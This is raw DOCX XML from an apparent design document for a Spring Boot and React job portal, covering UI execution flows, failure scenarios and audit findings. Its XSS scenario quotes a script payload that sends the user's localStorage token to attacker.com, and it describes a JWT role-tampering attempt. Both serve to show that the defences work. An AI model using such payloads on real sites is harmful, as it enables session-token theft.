        <w:t>5. AuditLogService records account suspension with admin IP.</w:t>
        <w:br/>
        <w:t>6. Returns 200 OK: { status: 'SUSPENDED' }.</w:t>
        <w:br/>
        <w:t>7. UI updates status pill from green 'Active' to red 'Suspended'; next time user tries to authenticate, Spring Security rejects with DisabledException.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Candidate: 'Bookmark / Save Job' Heart Button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JobCard.jsx -&gt; handleToggleSave()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Candidate clicks heart icon on JobCard.</w:t>
        <w:br/>
        <w:t>2. Dispatches jobApi.saveJob(jobId) -&gt; POST /api/saved-jobs/{id}.</w:t>
        <w:br/>
        <w:t>3. SavedJobController maps candidate and job; inserts record into saved_jobs table.</w:t>
        <w:br/>
        <w:t>4. Enforced by unique constraint on (user_id, job_id) preventing duplicates.</w:t>
        <w:br/>
        <w:t>5. Returns 201 Created; heart icon fills solid red with smooth micro-animation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Candidate: 'Synchronize Skills' Tag Manager Button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ProfilePage.jsx -&gt; handleSyncSkills()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Candidate adds/removes skill pills (e.g., adds 'Docker', 'AWS'); clicks 'Sync &amp; Save'.</w:t>
        <w:br/>
        <w:t>2. Dispatches profileApi.updateProfile({ skills: ['Java', 'Spring Boot', 'Docker', 'AWS'] }).</w:t>
        <w:br/>
        <w:t>3. CandidateProfileController invokes CandidateProfileService.</w:t>
        <w:br/>
        <w:t>4. ProfileService resolves Skill entities from SkillRepository; updates profile.skills collection.</w:t>
        <w:br/>
        <w:t>5. Hibernate syncs profile_skills join table via dirty checking.</w:t>
        <w:br/>
        <w:t>6. Returns 200 OK; toast notification confirms 'Skills updated successfully! Match scores recalculated.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>'What Happens If...' Edge Cases &amp; Failure Scenarios (20+ Deep Dives)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A senior full-stack engineer is judged by how their architecture responds when unexpected failures occur. Below are 20 concrete failure scenarios analyzed across network, backend, database, and UI layers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if the database server crashes or runs out of connections?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Database Connectivity Loss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>HikariCP connection pool attempts reconnection until connectionTimeout (default 30s) expires. Spring Data JPA throws CannotCreateTransactionException. GlobalExceptionHandler intercepts this and returns HTTP 503 Service Unavailable with a clean JSON envelope: { code: 'DATABASE_UNAVAILABLE', message: 'Persistence service temporarily offline.' }. The frontend Axios client catches the error and displays Screen 14 (Resilient Error Banner) rather than crashing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if a candidate clicks 'Apply' twice within 100 milliseconds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Concurrent Double-Click Race Condition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Both requests pass frontend validation. Request A checks applicationRepo.existsByJobAndCandidate, finds false, and inserts. Request B concurrently checks, finds false, and also attempts an insert. The database-level composite UNIQUE (job_id, candidate_id) constraint immediately halts Request B with a DataIntegrityViolationException. GlobalExceptionHandler catches this and returns HTTP 409 Conflict: { message: 'You have already applied for this position.' }. The database is never corrupted with duplicate applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if a user's JWT expires while they are filling out a long form?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Token Expiry Mid-Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>When the user clicks submit, the Authorization header contains an expired JWT. JwtAuthenticationFilter attempts claims parsing; JwtUtil throws ExpiredJwtException. Filter chain aborts and returns HTTP 401 Unauthorized. The Axios response interceptor catches the 401, immediately purges localStorage (clearing token and user state), and redirects the browser to /login with a query param '?expired=true', prompting the user to re-authenticate gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if an attacker tampers with the JWT payload (e.g. changes role to ROLE_ADMIN)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Cryptographic Signature Tampering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The attacker Base64Url-decodes the payload, changes 'roles': ['ROLE_CANDIDATE'] to ['ROLE_ADMIN'], re-encodes, and sends the request. JwtAuthenticationFilter executes jwtUtil.validateToken(). JJWT calculates HMACSHA256(header + '.' + tamperedPayload, secretKey). The calculated hash fails to match the token's original signature. JJWT raises SignatureException. The filter rejects the request immediately; SecurityContextHolder remains null; Spring Security returns HTTP 403 Forbidden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if a recruiter attempts to view applicants for a job owned by a different recruiter?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Broken Object-Level Authorization (BOLA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>RecruiterController executes jobService.verifyRecruiterOwnership(jobId, authenticatedUser). If job.getRecruiter().getId() != authenticatedUser.getId(), the service throws an AccessDeniedException. GlobalExceptionHandler intercepts and returns HTTP 403 Forbidden: { message: 'You are not authorized to view applicants for this requisition.' }. Data remains completely isolated across enterprise tenants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if a candidate uploads a 50MB file instead of a normal resume?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>File Upload Boundary Violation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Spring Boot's configured multipart limit (max-file-size=20MB) intercepts the request during multipart parsing before it reaches the controller. Tomcat raises MaxUploadSizeExceededException. GlobalExceptionHandler catches this and returns HTTP 413 Payload Too Large: { message: 'Uploaded file exceeds maximum allowed limit of 20MB.' }. The server JVM heap is protected from OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if a malicious user uploads an executable .exe disguised as a resume.pdf?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Malicious MIME-Type Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ResumeController streams the file bytes into Apache Tika's AutoDetectParser. Tika analyzes magic bytes (binary file signatures) rather than trusting the user-supplied file extension. If the detected MIME type is not 'application/pdf' or 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', the service throws InvalidFileFormatException, rejecting the upload with HTTP 400 Bad Request before saving to disk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if an attacker injects a cross-site scripting (XSS) payload into their bio?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Stored Cross-Site Scripting (XSS) Attempt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Attacker submits bio: '&lt;script&gt;fetch("http://attacker.com/steal?token=" + localStorage.getItem("token"))&lt;/script&gt;'. Spring Boot stores the string safely in the database (SQL parameter binding prevents SQLi). When a recruiter views the profile, React renders the text inside JSX: {profile.bio}. React treats the string as safe text and automatically HTML-escapes special characters (&lt; becomes &amp;lt;). The browser displays the raw script string as harmless text; the JavaScript is NEVER executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if a recruiter enters salaryMin = 50,000 and salaryMax = 20,000 when posting a job?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Business Validation Conflict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JobRequestDto contains custom cross-field validation. If salaryMin &gt; salaryMax, JobService throws InvalidJobRequisitionException. GlobalExceptionHandler returns HTTP 400 Bad Request with field error: 'Minimum salary cannot exceed maximum salary.' The invalid requisition is never persisted to the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>What if a candidate tries to withdraw an application after the recruiter has marked it HIRED?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Category: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Illegal State Machine Transition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Response &amp; Resilience: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicationService.withdrawApplication() checks current status. If status == ApplicationStatus.HIRED, the service throws IllegalStateException('Cannot withdraw a finalized hired application; please contact your recruiter directly.'). GlobalExceptionHandler returns HTTP 409 Conflict, preserving recruiter hiring records.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>28. Problems &amp; Bugs Found During System Audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit Findings &amp; Resolutions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>During full-system reverse-engineering and automated test execution, several critical architectural and runtime issues were discovered and systematically resolved:</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1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Issue Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Evidence &amp; Reproduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Root Cause Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Impact / Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Applied Resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ephemeral JWT Key on Reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tokens failed with SignatureException after server reboot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JwtUtil generated in-memory Keys.secretKeyFor(HS256) on boot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH: Forced all users to re-login on restart.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Externalized deterministic 256-bit secret key into application.properties.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
